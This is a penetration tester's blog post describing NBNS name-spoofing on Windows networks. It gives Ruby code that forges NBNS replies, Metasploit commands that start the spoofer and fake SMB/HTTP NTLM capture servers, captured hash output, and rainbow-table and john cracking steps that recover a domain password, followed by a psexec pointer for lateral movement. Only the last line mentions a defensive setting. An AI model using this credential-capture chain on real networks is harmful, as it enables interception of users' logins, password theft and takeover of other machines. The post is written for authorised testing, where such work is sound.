NBNS Spoofing On Your Way To World Domination

A few weeks ago I helped on the Red Team at the Midwest CCDC competition in Minneapolis (actually St. Paul, but close enough). There were some talented guys there and it was a lot of fun beating on those poor kids. I highly recommend you volunteer at events like this. You haven't lived until you've easily ripped the legs off a live domain controller while the owner sits and watches, with no ability to do anything about it (vnc + disabled mouse and keyboard).

Whenever I get together with a group of people like this, I like to exchange techniques and discuss trends. We discussed our paths of least resistance for internal tests, and I mentioned that my favorite are the attacks based on spoofing NetBIOS Name Service (NBNS) Responses. It is the very first tool I fire up on internal penetration tests, and it is very valuable on wireless penetration tests where client laptops are in scope. Before we get into the attack method I'll go over a bit of the background on what NBNS is.

When your Windows box needs to determine the IP address for a given name, it tries, in order, the following lookup methods:
  • local hosts file - C:\Windows\System32\drivers\etc\hosts
  • DNS
  • NBNS

You may wonder, how many queries get past DNS? The answer is, a lot! Any fat fingered internal server name, a laptop looking for its domain network resources while on another network, or would-be web searches will generate this traffic. You may ask, web searches, huh? We open up our browser and type "packetstan" in the address bar, what does the browser do?

Modern browsers allow you to search via the address bar (Chrome doesn't even have a dedicated search box), and the browser needs to determine if the text is a host or a query. If the string has spaces, it is obviously a search request. If there are no spaces the browser doesn't know if we want a server named "packetstan" or we want to search google/yahoo/bing for "packetstan", but it first tries to access a host named "packetstan" and therefore needs to try to resolve the IP for the host. i.e. if I do a search for "puppies", my browser will try to get an IP address for "puppies" (how cute).

The hosts file isn't going to have an entry for "packetstan", and DNS is going to fail to look up "packetstan" (no .com). So we land on NBNS. Here is a screen shot of the transaction:

[Screenshot: Wireshark capture of the DNS and NBNS lookup transaction for "packetstan"]

Since the lookup is just a hostname, Windows adds the local DNS suffix to the query and asks its DNS server(s). The suffix picked up by the Windows box usually comes from the DHCP server. As you can see, the DNS server replied that it had no idea how to look up that name. Next, you'll see the NBNS Request. The beautiful thing is, the NBNS Request is a broadcast, so anyone can reply easily and redirect traffic.

If we wanted to poison a DNS lookup we would have to somehow get in the middle of the traffic, and that takes some additional effort. NBNS is so easy I can even do it before I have my first cup of coffee, as I usually save MITM attacks until after a few cups of joe.

Wesley McGrew wrote a tool to forge NBNS replies. He also has a great three part series on the protocol and the tool writing process. Fans of this blog should really check out those posts. Now that we have a better understanding of NBNS, how do we spoof a reply?

To spoof an NBNS reply, we need to craft a reply packet that has the same Transaction ID as the request. The Transaction ID is similar to the one used by DNS (BTW, the numbers are sequential and are reset to \x80\x00 after each reboot). We also need to specify the IP address to send in the reply. For all intents and purposes, the rest of each response packet can be static.

Mr. McGrew's tool does what we described above, but I wanted it in Metasploit, which means rewriting it in Ruby. Unfortunately, Racket, the packet crafting tool for Ruby, doesn't have a module for NetBIOS, so we'll manually disassemble the packet and create a raw reply packet.

Using Wireshark as a guide, we can pull apart the packet, piece by piece.

nbnsq_transid      = packet[0..1]
nbnsq_flags        = packet[2..3]
nbnsq_questions    = packet[4..5]
nbnsq_answerrr     = packet[6..7]
nbnsq_authorityrr  = packet[8..9]
nbnsq_additionalrr = packet[10..11]
nbnsq_name         = packet[12..45]
nbnsq_type         = packet[46..47]
nbnsq_class        = packet[48..49]


As previously mentioned, all we really need is the Transaction ID and the Name. The Transaction ID is really simple as it is just 2 bytes, but what if we want to read the name? The raw name looks like this:

\x20FAEBEDELEFFEFDFEEBEOCACACACACAAA\x00


The leading space and trailing null byte are apparent, but what kind of encoding is used here? Master McGrew describes it in the second part of his blog post. Each character in our query ("PACKETSTAN") is split into nibbles (half bytes) and each nibble is added to \x41 (A), like this:
  • P = \x50
  • 1st nibble = 5, 2nd nibble is 0
  • 41 + 5 = 46 and \x46 = F
  • 41 + 0 = 41 and \x41 = A
  • P is then encoded as FA

We can decode and encode our name with this bit of Ruby (remember hex 41 equals decimal 65):

decoded = ""
# skip the leading length byte and the trailing null, one hex nibble per encoded byte
nbnsq_name.slice(1..-2).each_byte do |c|
    decoded << "#{(c - 65).to_s(16)}"
end
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()


We skip the first (space) and last (null) bytes and subtract 65 from each so we end up with "5041434B45545354414E20202020". We convert that into ASCII characters and strip the trailing spaces to get "PACKETSTAN".
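As an added example (not code from the original post or the Metasploit module), here is a small Ruby parser for the query layout above: it splits an NBNS query into the same fields, decodes the first-level encoded name, and includes the inverse encoder so a constructed "PACKETSTAN" query can be built and checked offline. The builder, the 0x0110 flag value and the suffix handling are my assumptions, not details taken from the post.

```ruby
# Added example: NBNS query parser and NetBIOS first-level name codec.
# Not from the original post or the Metasploit module.

# Decode the 34-byte name field: length byte 0x20, 32 encoded chars, null.
# Returns [name, suffix]; the suffix is the 16th decoded byte (0x00 = workstation).
def nbns_decode_name(raw)
  hex = ""
  raw.byteslice(1, 32).each_byte { |c| hex << (c - 65).to_s(16) }  # 'A'..'P' -> 0..f
  plain = [hex].pack('H*')                         # 15 name bytes + 1 suffix byte
  [plain.byteslice(0, 15).rstrip, plain.getbyte(15)]
end

# Inverse: upper-case, pad to 15 with spaces, append the suffix byte, split each
# byte into two nibbles and add 0x41 to each, then wrap in length byte and null.
def nbns_encode_name(name, suffix = 0x00)
  padded = (name.upcase.ljust(15)[0, 15] + suffix.chr).b
  enc = padded.each_byte.map { |b| ((b >> 4) + 65).chr + ((b & 0x0f) + 65).chr }.join
  "\x20".b + enc + "\x00".b
end

# Constructed 50-byte query using the post's offsets: header (12 bytes),
# name (34), type (2), class (2). Flags 0x0110 = broadcast + recursion desired
# (assumed typical value); type 0x0020 = NB, class 0x0001 = IN.
def build_nbns_query(transid, name)
  [transid, 0x0110, 1, 0, 0, 0].pack('n6') + nbns_encode_name(name) + [0x0020, 0x0001].pack('n2')
end

# Split a query into the fields the post lists, plus the decoded name.
def parse_nbns_query(packet)
  packet = packet.b
  raise ArgumentError, "short NBNS packet" if packet.bytesize < 50
  name, suffix = nbns_decode_name(packet.byteslice(12, 34))
  {
    transid:      packet.byteslice(0, 2).unpack('n')[0],
    flags:        packet.byteslice(2, 2).unpack('n')[0],
    questions:    packet.byteslice(4, 2).unpack('n')[0],
    answerrr:     packet.byteslice(6, 2).unpack('n')[0],
    authorityrr:  packet.byteslice(8, 2).unpack('n')[0],
    additionalrr: packet.byteslice(10, 2).unpack('n')[0],
    name:         name,
    suffix:       suffix,
    type:         packet.byteslice(46, 2).unpack('n')[0],
    class:        packet.byteslice(48, 2).unpack('n')[0]
  }
end

if __FILE__ == $0
  q = parse_nbns_query(build_nbns_query(0x8001, "packetstan"))
  puts "transid=%04x name=%s suffix=%02x type=%04x" % [q[:transid], q[:name], q[:suffix], q[:type]]
end
```

The encoder reproduces the raw name shown above byte for byte, and the parser is the read-only half of the module's work: it is enough to log or alert on the names being queried on a segment.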

Fortunately, we don't really need to re-encode the string since we can just use the original in our reply. However, I use this string to check a regular expression so we only reply to the in-scope clients.

if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i)
    ...


The raw response packet is then created. You'll notice that most of our packet is static or taken directly from the Request packet.

response = nbnsq_transid +
    "\x85\x00" + # Flags = response + authoritative + recursion desired
    "\x00\x00" + # Questions = 0
    "\x00\x01" + # Answer RRs = 1
    "\x00\x00" + # Authority RRs = 0
    "\x00\x00" + # Additional RRs = 0
    nbnsq_name + # original query name
    nbnsq_type + # Type = NB ...whatever that means
    nbnsq_class + # Class = IN
    "\x00\x04\x93\xe0" + # TTL = a long ass time
    "\x00\x06" + # Datalength = 6
    "\x00\x00" + # Flags B-node, unique = whatever that means
    datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')


The last line takes the IP address to spoof and converts it to bytes (i.e. 1.2.3.4 -> \x01\x02\x03\x04). Fortunately, the bytes are big endian, so we don't have to rearrange the order.

Now we can run the module in Metasploit:

msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   REGEX    .*               yes       Regex applied to determene if spoofed reply is sent
   SPOOFIP                   yes       IP address with which to poison responses
   VERBOSE  true             no        Determines whether to display responses

msf auxiliary(nbns_response) > set spoofip 192.168.1.52
spoofip => 192.168.1.52
msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer initializing
[*] NBNS Spoofer initialed. Waiting for packets...


The default regular expression will match any query, and when one is found you will see a message like this:

[*] Regex matched PACKETSTAN from 192.168.1.51. Sending reply...


Ok, great, so we sent a reply and have poisoned a name lookup. So what?

We can use Metasploit to set up a few fake services. That way, if a host lookup was for a web server or a file server (smb) the user will be directed to our Metasploit instance. The Metasploit modules in question will request authentication, and the client will happily send it credentials (sort of).


msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /home/tm/johnsmb
JOHNPWFILE => /home/tm/johnsmb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE  /home/tm/johnsmb  no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE                       no        The local filename to store the captured hashes
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.

msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /home/tm/httplog
LOGFILE => /home/tm/johnhttp
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(http_ntlm) > show options

Module options (auxiliary/server/capture/http_ntlm):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   LOGFILE     /home/tm/httplog  no        The local filename to store the captured hashes
   PWFILE                        no        The local filename to store the hashes in Cain&Abel format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80                yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                 no        The URI to use for this exploit (default is random)


Any Windows box that accesses our SMB share will automatically try to authenticate. The web browser is a different story, and depends on the browser and on whether the client machine is joined to a domain. It will either send credentials automatically or prompt the user for credentials. The table below describes when credentials are automatically sent, and when they aren't.

Browser   Domain Joined   Standalone (Non-Domain)
Chrome    Automatic       Performs Google Search
IE        Automatic       User Prompted
FireFox   User Prompted   User Prompted


Most of the machines in scope for my tests are joined to the corporate domain, so this attack works great! A Windows box that is part of a domain treats hosts, non-FQDN hostnames, as part of its "Local Intranet Zone". This zone has all sorts of settings to make single sign-on easier. IE and Chrome both use this "Local Intranet Zone", while Firefox does not.

After typing "packetstan" into Chrome on my domain-joined host, Metasploit gives me this output:

[*] Regex matched PACKETSTAN from 192.168.1.61. Sending reply...
[*] Request '/' from 192.168.1.61:1134
[*] Request '/' from 192.168.1.61:1134
[*] Request '/' from 192.168.1.61:1134
[*] 192.168.1.61: MYDOM\tim 4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f:
      44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05 on ALPHA


If we look at the log file we'll see this:

$ cat httplog
Thu Mar 31 18:18:18 -0500 2011:192.168.1.61:MYDOM:packetstan:tim:4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f:44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05


The SMB capture module will output a John the Ripper compatible file. However, the http_ntlm module doesn't give us the file format we want (I'm working on a fix), so we'll have to modify the file to look like this:
<user>:::<LMHASH>:<NTLMHASH>:<CHALLENGE> (wrapped for space, the actual file won't be wrapped):

MYDOM\tim:::4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f: 44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05:1122334455667788


Note: Windows 7 and Windows 2008 will not return a LM Hash and any further steps will not work, as these steps rely on the weak LM Hash. You can still brute force the NetNTLMv2 hash, but there are no shortcuts.

The hashes sent via SMB or HTTP aren't your straight LM and NTLM hashes. While the full details require a separate blog post, the short version is they are salted with a challenge to "ensure" they can't be reused. However, Metasploit uses a static challenge (1122334455667788) so we can use rainbow tables to crack the password. The tables can be used with rcracki, and the halflmchall_alpha-numeric (smaller) or halflmchall_all-space (larger) tables are available from freerainbowtables.com. You can download both of them (28GB) via wget like this:

$ wget -r ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/


All we need to do is run our hash against the rainbow table. We need the first 16 characters of the LM hash output (8 bytes of LM hash) and the path to the rainbow tables.

$ ./rcracki_mt -h 4f717259791a8a3d /storage/RainbowTables/halflmchall_alpha-numeric/
[sudo] password for tm:
Using 3 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...

halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
file length mismatch

halflmchall_alpha-numeric#1-7_1_2400x56281894_1122334455667788_distrrtgen[p][i]_0.rti:
reading index... 13528977 bytes read, disk access time: 0.01 s
reading table... 450255152 bytes read, disk access time: 0.35 s
verifying the file... ok
searching for 1 hash...
plaintext of 4f717259791a8a3d is MYPASSW
cryptanalysis time: 3.40 s

statistics
-------------------------------------------------------
plaintext found:          1 of 1 (100.00%)
total disk access time:   0.36 s
total cryptanalysis time: 3.40 s
total chain walk step:    2876401
total false alarm:        840
total chain walk step due to false alarm: 825144

result
-------------------------------------------------------
4f717259791a8a3d        MYPASSW hex:4d595041535357


In 3.4 short seconds we have the first 7 characters of the password. The latest version (at the time of writing) of John the Ripper (1.7.6-jumbo12) has a perl file named netntlm.pl that will bruteforce the second part of the password. We just need to give it the first part of the password and a john compatible file (output trimmed).

$ perl netntlm.pl --seed MYPASSW --file /john-http

###########################################################################################
The following LM responses have been previously cracked:

The following NTLM responses have been previously cracked:

###########################################################################################
Isolating accounts which have only had their LM response cracked.
Account MYDOM\\tim LM response added to cracking list.
...
Loaded 1 password hash (LM C/R DES [netlm])
MYPASSWORD1      (MYDOM\\tim)
guesses: 1  time: 0:00:00:26  c/s: 515198  trying: MYPASSWORD1


We can see that my password is MYPASSWORD1. However, LM passwords are case insensitive and are always presented in upper case. To get the case sensitive password we run the *same* command again. The second pass will use "MYPASSWORD1" against the case sensitive NTLM hash.

$ perl netntlm.pl --seed MYPASSW --file /john-http

###########################################################################################
The following LM responses have been previously cracked:

MYDOM\tim:MYPASSWORD1::4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f:44(trimmed)

The following NTLM responses have been previously cracked:

...
Performing NTLM case-sensitive crack for account: MYDOM\tim.
guesses: 1  time: 0:00:00:00 100.00% (ETA: Thu Mar 31 12:57:51 2011)  c/s: 3352  trying: MyPassword1
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
MyPassword1      (MYDOM\tim)
...


We now have the case sensitive password. Awesome!

In summary, to use this method perform the following steps:
  • Start the following Metasploit modules
    • auxiliary/spoof/nbns/nbns
    • auxiliary/server/capture/smb
    • auxiliary/server/capture/http_ntlm
  • Crack the first half of the LM hash with rainbow tables
  • Brute force the second half of the password with john's netntlm.pl
  • Run the same netntlm.pl again to get the case sensitive password


This method will usually yield credentials pretty quickly, but to get some higher privileged accounts just wait a while.

Once you have a cracked password you can (usually) connect to boxes all over the place by using Metasploit's exploit/windows/smb/psexec module.

To prevent this attack from being as effective, you need to change the LAN Manager authentication level to refuse LM via GPO. It isn't enough to use "Send NTLM response only" or "Send NTLMv2 response only".